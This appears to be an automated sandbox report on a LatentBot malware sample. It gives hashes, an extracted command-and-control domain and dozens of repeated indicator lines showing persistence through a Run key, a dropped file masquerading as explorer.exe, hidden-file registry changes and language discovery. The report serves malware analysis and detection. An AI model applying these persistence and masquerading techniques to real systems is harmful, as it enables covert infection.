Analysis
-
max time kernel
150s -
max time network
146s -
platform
windows11-21h2_x64 -
resource
win11-20250410-en -
resource tags
arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system -
submitted
20/04/2025, 05:30
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe
Resource
win10v2004-20250410-en
Behavioral task
behavioral2
Sample
JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe
Resource
win11-20250410-en
General
-
Target
JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe
-
Size
48KB
-
MD5
c4ad493a6bfd212c4e1418ba605020af
-
SHA1
20272ac81bd1df68603924ae3b1fe4c2df034a29
-
SHA256
492bd918e98e5802cf1ff5d3f0537567a7657477fff9cb5e7657448f64ead496
-
SHA512
736487e85b4986284139599befb69a3483108c6199e6737524aafad9daa8614e67ab244859d71affacbcebba8e07af91fb2c4c10484f7988fa7dacd51897ccaf
-
SSDEEP
768:/evN/sOhfTEr9IioMKMevN/sOhfTEr9IioMKa:/elEOhrkIwKMelEOhrkIwKa
Malware Config
Extracted
latentbot
superwaffles.zapto.org
Signatures
-
Latentbot family
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe -
Executes dropped EXE 64 IoCs
pid Process 3500 explorer.exe 5768 explorer.exe 3660 explorer.exe 1896 explorer.exe 5332 explorer.exe 3156 explorer.exe 5536 explorer.exe 568 explorer.exe 1044 explorer.exe 2812 explorer.exe 2304 explorer.exe 2756 explorer.exe 6016 explorer.exe 3420 explorer.exe 4652 explorer.exe 3912 explorer.exe 4848 explorer.exe 5468 explorer.exe 3636 explorer.exe 5860 explorer.exe 876 explorer.exe 5536 explorer.exe 744 explorer.exe 1520 explorer.exe 1448 explorer.exe 4544 explorer.exe 1992 explorer.exe 1004 explorer.exe 5788 explorer.exe 1480 explorer.exe 4248 explorer.exe 4748 explorer.exe 464 explorer.exe 4960 explorer.exe 4572 explorer.exe 2016 explorer.exe 484 explorer.exe 4044 explorer.exe 1732 explorer.exe 5944 explorer.exe 960 explorer.exe 3680 explorer.exe 1108 explorer.exe 1260 explorer.exe 5832 explorer.exe 4904 explorer.exe 3272 explorer.exe 3660 explorer.exe 944 explorer.exe 5884 explorer.exe 2108 explorer.exe 5492 explorer.exe 5512 explorer.exe 1360 explorer.exe 5984 explorer.exe 4916 explorer.exe 5508 explorer.exe 2516 explorer.exe 1980 explorer.exe 4400 explorer.exe 4556 explorer.exe 760 explorer.exe 2604 explorer.exe 3748 explorer.exe -
Adds Run key to start application 2 TTPs 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
